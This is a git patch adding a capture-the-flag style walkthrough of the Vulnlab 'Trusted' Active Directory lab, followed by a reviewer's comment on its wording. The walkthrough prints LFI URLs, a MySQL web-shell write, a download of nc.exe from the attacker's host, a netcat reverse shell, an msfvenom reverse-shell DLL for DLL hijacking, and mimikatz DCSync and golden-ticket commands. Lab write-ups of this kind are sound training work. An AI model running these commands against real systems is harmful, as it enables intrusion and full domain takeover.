From 687731035dbdf2e24a4568560ed2f0a95125ed01 Mon Sep 17 00:00:00 2001 From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com> Date: Mon, 26 Jun 2023 23:30:13 +0500 Subject: [PATCH] Create Trusted.md --- Vulnlab/Trusted.md | 380 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 380 insertions(+) create mode 100644 Vulnlab/Trusted.md diff --git a/Vulnlab/Trusted.md b/Vulnlab/Trusted.md new file mode 100644 index 0000000..bc96ef1 --- /dev/null +++ b/Vulnlab/Trusted.md 
@@ -0,0 +1,380 @@ +# Vulnlab - Trusted + +# 10.10.212.5 + +## NMAP + +```bash +Nmap scan report for 10.10.212.5 +Host is up (0.097s latency). +Not shown: 65509 closed tcp ports (reset) +PORT STATE SERVICE VERSION +53/tcp open domain Simple DNS Plus +88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-06-19 17:35:47Z) +135/tcp open msrpc Microsoft Windows RPC +139/tcp open netbios-ssn Microsoft Windows netbios-ssn +389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name) +445/tcp open microsoft-ds? +464/tcp open kpasswd5? +593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 +636/tcp open tcpwrapped +3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name) +3269/tcp open tcpwrapped +3389/tcp open ms-wbt-server Microsoft Terminal Services +|_ssl-date: 2023-06-19T17:37:17+00:00; +38s from scanner time. +| ssl-cert: Subject: commonName=trusteddc.trusted.vl +| Issuer: commonName=trusteddc.trusted.vl +| Public Key type: rsa +| Public Key bits: 2048 +| Signature Algorithm: sha256WithRSAEncryption +| Not valid before: 2023-04-21T14:47:57 +| Not valid after: 2023-10-21T14:47:57 +| MD5: 45ea20be5e4bca32c9fc20b0d2c3801a +|_SHA-1: 46afd9e24c5f561f7de1089a8038b9f856db4b8a +| rdp-ntlm-info: +| Target_Name: TRUSTED +| NetBIOS_Domain_Name: TRUSTED +| NetBIOS_Computer_Name: TRUSTEDDC +| DNS_Domain_Name: trusted.vl +| DNS_Computer_Name: trusteddc.trusted.vl +| Product_Version: 10.0.20348 +|_ System_Time: 2023-06-19T17:37:01+00:00 +5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) +|_http-server-header: Microsoft-HTTPAPI/2.0 +|_http-title: Not Found +9389/tcp open mc-nmf .NET Message Framing +47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) +|_http-title: Not Found +|_http-server-header: Microsoft-HTTPAPI/2.0 +``` + +# 10.10.212.6 + +## NMAP + +```bash +Nmap scan report for 10.10.212.6 +Host is up (0.088s latency). 
+Not shown: 65508 closed tcp ports (reset) +PORT STATE SERVICE VERSION +53/tcp open domain Simple DNS Plus +80/tcp open http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6) +|_http-favicon: Unknown favicon MD5: 56F7C04657931F2D0B79371B2D6E9820 +| http-title: Welcome to XAMPP +|_Requested resource was http://10.10.212.6/dashboard/ +|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 +| http-methods: +|_ Supported Methods: GET HEAD POST OPTIONS +88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-06-19 17:35:53Z) +135/tcp open msrpc Microsoft Windows RPC +139/tcp open netbios-ssn Microsoft Windows netbios-ssn +389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name) +443/tcp open ssl/http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6) +|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD +| http-title: Welcome to XAMPP +|_Requested resource was https://10.10.212.6/dashboard/ +| tls-alpn: +|_ http/1.1 +|_ssl-date: TLS randomness does not represent time +| ssl-cert: Subject: commonName=localhost +| Issuer: commonName=localhost +| Public Key type: rsa +| Public Key bits: 1024 +| Signature Algorithm: sha1WithRSAEncryption +| Not valid before: 2009-11-10T23:48:47 +| Not valid after: 2019-11-08T23:48:47 +| MD5: a0a44cc99e84b26f9e639f9ed229dee0 +|_SHA-1: b0238c547a905bfa119c4e8baccaeacf36491ff6 +|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 +| http-methods: +|_ Supported Methods: GET HEAD POST OPTIONS +445/tcp open microsoft-ds? +464/tcp open kpasswd5? +593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 +636/tcp open tcpwrapped +3306/tcp open mysql MySQL 5.5.5-10.4.24-MariaDB +| mysql-info: +| Protocol: 10 +|_ Auth Plugin Name: mysql_native_password +3389/tcp open ms-wbt-server Microsoft Terminal Services +|_ssl-date: 2023-06-19T17:37:17+00:00; +39s from scanner time. 
+| rdp-ntlm-info: +| Target_Name: LAB +| NetBIOS_Domain_Name: LAB +| NetBIOS_Computer_Name: LABDC +| DNS_Domain_Name: lab.trusted.vl +| DNS_Computer_Name: labdc.lab.trusted.vl +| DNS_Tree_Name: trusted.vl +| Product_Version: 10.0.20348 +|_ System_Time: 2023-06-19T17:37:03+00:00 +| ssl-cert: Subject: commonName=labdc.lab.trusted.vl +| Issuer: commonName=labdc.lab.trusted.vl +| Public Key type: rsa +| Public Key bits: 2048 +| Signature Algorithm: sha256WithRSAEncryption +| Not valid before: 2023-04-21T14:48:14 +| Not valid after: 2023-10-21T14:48:14 +| MD5: 6b0e83e111daedeaeec7494630f036f6 +|_SHA-1: 3b251ec4daa9f35d915589b7f6bb59fc071707c8 +5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) +|_http-title: Not Found +|_http-server-header: Microsoft-HTTPAPI/2.0 +``` + +## PORT 445 (SMB) + +Performing null authentication on SMB didn't showed any shares as well + + + +## PORT 389 (LDAP) + +On ldap, performing null authentication didn't worked as well + + + + +## PORT 80/443 (HTTP/HTTPS) + +The webserver had XAMPP running + + + +Fuzzing for files with gobuster it showed `/dev` + + + + + +On visiting any of the pages, it's going to take the html page name as a GET parameter `view` + + + +So here we can try Local File Inclusion (LFI) to see if any of the local files get included + +```bash +http://10.10.212.6/dev/index.html?view=C:/WINDOWS/System32/drivers/etc/hosts +``` + + + +We can check the source of index.html file by using `php://filter` to encode the file contents in base64 as it might have php code which gets executed if it's in plain text + + + + + +At the bottom we can see why we were able to include local files, as it's using `include` on GET parameter and accepting files. 
secondly we see a comment for Eric which talks about setting up database connection, on trying to fuzz for php files, we get `db.php` + + + +From here we can get credentials to mysql + + + + +With these credentials we can login to mysql + + + +With `news` database, we can query for `users` table + + + +Here we can find three usernames, out of which `rsmith`'s hash was cracked + + + +On trying to crack these hashes with Crackstation + + + +We can check if these credentials works on the target machine with `crackmapexec` + + + +Checking the shares, there's wasn't any interesting share + + + +## Un-Intended (SYSTEM) + +Going back to mysql, since we are root user, we may have file and write privilege, we can create a php file to execute system commands through GET parameter + +```mysql +select "" INTO OUTFILE 'C:/xampp/htdocs/dev/shell.php'; +``` + + + + + +Transferring `nc.exe` by setting up a python server to host the file + +```powershell +curl http://10.8.0.136/nc64.exe -o C:/Windows/Temp/nc.exe +``` + + + + +Now executing it while having our netcat listener ready + +```powershell +C:/Windows/Temp/nc.exe 10.8.0.136 2222 -e cmd.exe +``` + + + +## Intended (ewalters) + +I wasn't able to run `python-bloodhound`, not sure what was the issue, since we have SYSTEM user on LABDC, I decided to enumerate `lab.trusted.vl` domain with sharphound.exe by downloading it through our python server + + + +We can then download this through evil-winrm, since we have the administrator hash from the dump + + + +Running bloodhound on the json files we got from sharphound, we can see a path from `rsmith` to `ewalters` by having `ForceChangePassword` ACL on ewalters, we can change the password and login by either WinRM or RDP since it has `CanPSRemote` permissions on the host + + + +Through `rpcclient`, ewalters's password can be changed + +```bash +setuserinfo2 ewalters 23 'Ewwalter@123456' +``` + + + +With cme we can verify if the password is actually updated and we can login through 
WinRM + + + + + +In `C:/` drive, there was a folder `AVTest` which had `readme.txt` talking about Christine to run AV tools + + + +Using `smbserver.py` to transfer `KasperskyRemovalTool.exe` + + + + + + +## Privilege Escalation (cpowers) + +Transferring the exe on windows machine and running `Process Monitor/Procmon` to analyze which DLL is being loaded by this exe, on launching procmon, it's going to capture all system events + + + +Running `KasperskyRemovalTool.exe` to make sure it's events gets logged + + + +Hit `ctrl+E` to stop capturing for system events and apply filters to only display kaspersky process + + + +First applying the filter for `KasperskyRemovalTool` process name + + + +Next adding the filter for the dll files + + + +Lastly for dlls which are not found, Here we'll see `KasperskyRemovalToolENU.dll` +being loaded, so we need to create 32 bit DLL since the exe is in PE32 format + + + + + +```bash +msfvenom -p windows/shell_reverse_tcp LHOST=10.8.0.136 LPORT=2222 -f dll > KasperskyRemovalToolENU.dll +``` + + + +Transferring the dll file and putting it in `C:/AVTest` as the dll was being loaded from the same location from where the exe was being executed + + + +Now wait for few seconds for the exe to be triggered which will execute our malicious dll and we'll get a shell as `cpowers` + + + +This user was a member of `domain admin` , so we have complete access on the first machine + + + +## Privilege Escalation (Enterprise Admin) + +We can enumerate the trust between `labdc.trusted.vl` and `trusted.vl` + +```powershell +([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() + +nltest.exe /trusted_domains +``` + + + +Following this article, we can abuse this child->parent domain trust relationship and escalate to enterprise domain, in order to do this we need the krbtgt hash of lab.trusted.vl and the SIDs of both domains, then with mimikatz we can forge a golden ticket for the enterprise domain admin + 
+```powershell +lsadump::dcsync /domain:lab.trusted.vl /all +``` + +Dumping ntds.dit to get the krbtgt hash by using `mimikatz` + + + + + +Getting the domain SID of lab.trusted.vl and trusted.vl by running `lsadump::trust /patch` + + + +Now forging a ticket for enterprise domain admin + +```powershell +kerberos::golden /user:Administrator /krbtgt:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /ptt +``` + + + +All that is left is to dump ntds from trusted.vl domain + +```powershell +lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /all +``` + + + + + +Having the administrator's hash from trusted.vl, we can login through WinRM and complete this AD chain. + + + +Even tho we are administrator on the machine, the flag wasn't still readable as it was giving access denied + + + +Here I had to login as the administrator by changing his password and then grabbing the flag + + + + +## References + +- https://github.com/aniqfakhrul/powerview.py +- https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword +- https://medium.com/techzap/dll-hijacking-part-1-basics-b6dfb8260cf1 +- https://redteamtechniques.github.io/Windows%20%26%20AD%20Hacking/Lab%20Attacks/Abusing%20Parent%20Child%20Domain%20Trusts%20for%20Privilege%20Escalation%20from%20DA%20to%20EA/ +
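Review bot: In the "Privilege Escalation (Enterprise Admin)" section the `lsadump::dcsync /domain:lab.trusted.vl /all` block lands before the sentence that introduces it, and that sentence labels the step "Dumping ntds.dit", which is not what DCSync does: it asks a domain controller to replicate account secrets over the directory replication service (DRSUAPI) and never touches the ntds.dit file, so move the block below "Dumping ntds.dit to get the krbtgt hash by using `mimikatz`" and reword to something like "Using DCSync to obtain the krbtgt hash"; the later line "All that is left is to dump ntds from trusted.vl domain" has the same wording problem. Two smaller points. In "Un-Intended (SYSTEM)" the statement `select "" INTO OUTFILE 'C:/xampp/htdocs/dev/shell.php';` has an empty string literal (the PHP tag was probably swallowed when the markdown was rendered), so the step cannot be followed as written; either escape it or just say a PHP file was written, and make the precondition that "we may have file and write privilege" hints at explicit: INTO OUTFILE only works when the MySQL account holds the FILE privilege and `secure_file_priv` does not restrict the destination directory, which is also the setting a defender would tighten on the XAMPP host. Finally, the long runs of blank `+` lines after "Performing null authentication on SMB", "From here we can get credentials to mysql", "Here we can find three usernames", the bloodhound path description and the Procmon filter steps look like places where screenshots were meant to appear, but no image is referenced anywhere in the commit, so the supporting output (the three usernames, the `db.php` contents, the `KasperskyRemovalToolENU.dll` NAME NOT FOUND event, the trust enumeration result) is missing and the write-up does not stand on its own; pasting the text output instead of images would fix that and keep the document searchable.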